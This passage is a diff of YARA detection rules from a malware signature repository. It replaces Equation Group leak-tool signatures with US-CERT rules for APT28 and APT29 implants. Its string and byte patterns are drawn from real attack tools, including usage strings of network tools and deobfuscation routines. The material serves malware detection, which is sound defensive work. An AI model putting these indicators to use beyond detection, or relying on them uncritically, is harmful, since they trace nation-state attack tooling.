+		$key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 }
+		$key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 }
+		$key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 }
+		$key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 }
+		$key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 }
+		$key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 }
+		$key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 }
+		$key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED }
+		$key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D }
+		$key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 }
+		$key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E }
+		$key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 }
+		$key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D }
+		$key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C }
+		$key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 }
+		$key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A }
+		$key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D }
+		$key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B }
+		$key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 }
+		$key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF }
+		$key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 }
+		$key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 }
+		$key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 }
+		$key125 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 }
+		$key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 }
+		$key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak_Min_Install : FILE
+rule SIGNATURE_BASE_IMPLANT_5_V3
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dc648deb-4220-5ec3-b95f-ff6cc463f79b"
-		date = "2017-04-15"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "0763e314-85d0-5c16-b766-36298176e0ff"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2827-L2842"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1194-L1207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f224c87c5626fee98dae5b4bbab2b4468bdd126ac63371ede53545d7cb177123"
-		score = 75
+		logic_hash = "aec1314858732d30b62a033e85eea50b3375e4f5b0e1818a941979d5be672297"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e"
+		tags = ""
 
 	strings:
-		$s1 = "driver start" fullword ascii
-		$s2 = "DeviceIoControl Error: %d" fullword ascii
-		$s3 = "Phlook" fullword ascii
+		$BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 }
+		$BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setouraddr : FILE
+rule SIGNATURE_BASE_IMPLANT_5_V4
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a2dbfa7b-3fb6-56cf-9391-1a3abb08e3cb"
-		date = "2017-04-15"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "db6df7ea-f119-5e9a-bcea-c65580418042"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2844-L2858"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1209-L1225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d49bcef48afeb63b763c88443930f28be1d6f9f27d5f0bd9161d151fa3081868"
-		score = 75
+		logic_hash = "98a08860453496d9629f62c64fed50a24b8378dcfa39b8b654610c2ac9084fa8"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504"
+		tags = ""
 
 	strings:
-		$s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" fullword ascii
-		$s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii
+		$FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
+		$FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
+		$FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
+		$FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
+		$FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Getadmin_LSADUMP_Modifyprivilege_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3fda153-563c-5a5c-9f5c-12d6ef8b3d95"
-		date = "2017-04-15"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "0554ec8e-f45d-5afc-8874-dc8adfac5cdf"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2860-L2882"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1227-L1243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee5c818c29ccb1b280669f7f5e828963c4523b73b68674d8c0aae72189f0208c"
-		score = 75
+		logic_hash = "c60402a029034545df302485c14e9485f806f2bc7d5fd759e84d1ecba9854837"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff"
-		hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741"
 
 	strings:
-		$s1 = "\\system32\\win32k.sys" wide
-		$s2 = "hKeAddSystemServiceTable" fullword ascii
-		$s3 = "hPsDereferencePrimaryToken" fullword ascii
-		$s4 = "CcnFormSyncExFBC" fullword wide
-		$s5 = "hPsDereferencePrimaryToken" fullword ascii
-		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
-		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
-		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
+		$STR1 = "dll.dll" wide ascii
+		$STR2 = "Init1" wide ascii
+		$STR3 = "netui.dll" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 4 of ( $s* ) or all of ( $op* ) ) )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sendpktrigger : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6cbf95eb-323c-53a3-9aca-222626add4dc"
-		date = "2017-04-15"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "59bfbef2-ff0e-59df-9d08-15001cec8ecf"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2884-L2897"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1245-L1258"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "277367e69406a84ff4ff6b57d05bf97468b0083e23f9c5cd14cdd26cad5846d7"
-		score = 75
+		logic_hash = "7e81e8bcc305b9b7166db85d81278c96edf232bf60040ef15a2376f204ca3046"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
 
 	strings:
-		$x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide
+		$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target_2 : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "426e982c-2380-5801-ba80-ab25ec4c0f74"
-		date = "2017-04-15"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "db090bc5-a90f-5b66-8fcb-29b423dddbf7"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2899-L2916"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab9ab949ee17655e424f6a65d3605e9900d214d1c620e051104762d5c214419f"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904"
-
-	strings:
-		$s1 = "\\\\.\\%ls" fullword ascii
-		$op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 }
-		$op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 }
-		$op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
-}
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mstcp32_DXGHLP16_Tdip : FILE
-{
-	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5b54e68b-7bf3-59a0-8257-c370a3b9e4db"
-		date = "2017-04-15"
-		modified = "2023-01-06"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2918-L2938"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1260-L1275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "35fab86ca4cb287c8046a1764a91523673e12b5729d87c90b0c298dcbfcf86eb"
-		score = 75
+		logic_hash = "833a6a3a4ff8ca43d4cf8053bfd1da49df96d9833dd3fe0f3ffbf6ce6c114681"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
-		hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
-		hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29"
 
 	strings:
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s2 = "\\DosDevices\\%ws" wide
-		$s3 = "\\Device\\%ws_%ws" wide
-		$s4 = "sys\\mstcp32.dbg" fullword ascii
-		$s5 = "%ws%03d%ws%wZ" fullword wide
-		$s6 = "TCP/IP driver" fullword wide
+		$deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A
+         04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A
+         1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regprobe : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "184618b7-a24c-5a8c-9fb2-a5a07f1a0299"
-		date = "2017-04-15"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "27118ec8-3713-5670-88d2-3ac57c155c0d"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2940-L2955"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1277-L1291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "01e7387c26ae3736c8fac1a3bb6ff283f8b06949af7a4ac36a556b292412bda2"
-		score = 75
+		logic_hash = "f5388668e148223bc94680ea84e83b0f2896ccf433523d171c8f46d7069f9a4b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de"
 
 	strings:
-		$x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii
-		$x2 = "key does not exist or pinging w2k system" fullword ascii
-		$x3 = "RpcProxy=255.255.255.255:65536" fullword ascii
+		$ASM = {53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? ?b
+         [6-10] c0 [0-1] c3}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublefeaturedll_Dll_2 : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V5 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f77fd49f-815b-5fb9-a3d7-8721edf79b28"
-		date = "2017-04-15"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "d035eaff-8c2a-53a2-b629-6448b2bcc9f6"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2957-L2974"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1293-L1327"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d6751ebfb2541c86b74583b7867de0a193ca106bf77337c8b10f15cdeb596bd"
-		score = 75
+		logic_hash = "b3ba650818ddbc58ce272ae4851ae3151a8cf1c9cc6f8e234a50b52c95d951fe"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af"
-		hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985"
-		hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e"
 
 	strings:
-		$s1 = ".dllfD" fullword ascii
-		$s2 = "Khsppxu" fullword ascii
-		$s3 = "D$8.exe" fullword ascii
+		$STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B
+         EA 8D 14 08 B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD
+         57 8B 7C 24 38 89 6C 24 1C C1 EE 02 3B DE 89 5C 24 18 89 74 24 20 0F
+         83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85 CF 00 00
+         00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83
+         86 00 00 00 8A C3 B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D
+         71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A 44 37 FE 03 D6 8B D8 8D
+         46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32
+         D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5
+         8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38
+         41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 24 1C 8B 74 24 20
+         8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F
+         82 3C FF FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB
+         0D 33 C9 89 4C 24 38 E9 40 FF FF FF 33 C9 8B 44 24 24 33 D2 BE 06 00
+         00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00 8A C3 B2
+         06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34
+         8D 54 03 FE 89 54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44
+         3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA 07 89 54 24 2C 8D 46 FF 33 D2
+         BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5
+         8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B
+         44 24 14 02 D9 8A 0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46
+         3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 C2 10 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gangsterthief_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V6 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9127f280-135e-5f83-9587-eab3ad84ad69"
-		date = "2017-04-15"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "89cc3764-d60c-5cbd-af32-a90d8b3400d7"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2976-L2993"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1329-L1343"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8145d6eedf20cf95baf329a6240b5b740273ff0a7f82edd3c346eb8c67e69e1"
-		score = 75
+		logic_hash = "77b5f95cd897c82c200ee6fa3970824adccfd7c56639d92361095f919781d731"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06"
 
 	strings:
-		$s1 = "\\\\.\\%s:" fullword wide
-		$s4 = "raw_open CreateFile error" fullword ascii
-		$s5 = "-PATHDELETED-" ascii
-		$s6 = "(deleted)" fullword wide
-		$s8 = "NULLFILENAME" fullword ascii
+		$Init1_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50
+         FF 15 ?? ?? ?? ?? 33 C0 C3}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallbackports : FILE
+rule SIGNATURE_BASE_IMPLANT_7_V1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
-		date = "2017-04-15"
+		description = "Implant 7 by APT29"
+		author = "US CERT"
+		id = "ce83c157-af03-55cb-a2be-0b6543fedb5b"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2995-L3009"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1368-L1381"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e087534589228ac1af8b8b8d2ebbc1bc99fc25b38cb4c4d840cab8e90e75644a"
-		score = 75
+		logic_hash = "996f81fe006e0ab15adab46275fdb60251e6c6616da33df600fadfc2684c24af"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0"
 
 	strings:
-		$s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" fullword ascii
-		$s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii
+		$STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
+		$STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D ) and ( $STR1 or $STR2 )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH_2000 : FILE
+rule SIGNATURE_BASE_IMPLANT_8_V1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b02fa407-e6f1-5c2d-a587-7edb55dbe0a5"
-		date = "2017-04-15"
+		description = "HAMMERTOSS / HammerDuke Implant by APT29"
+		author = "US CERT"
+		id = "eeaa43c1-6004-5d64-bdc1-f84b3c68d741"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3011-L3025"
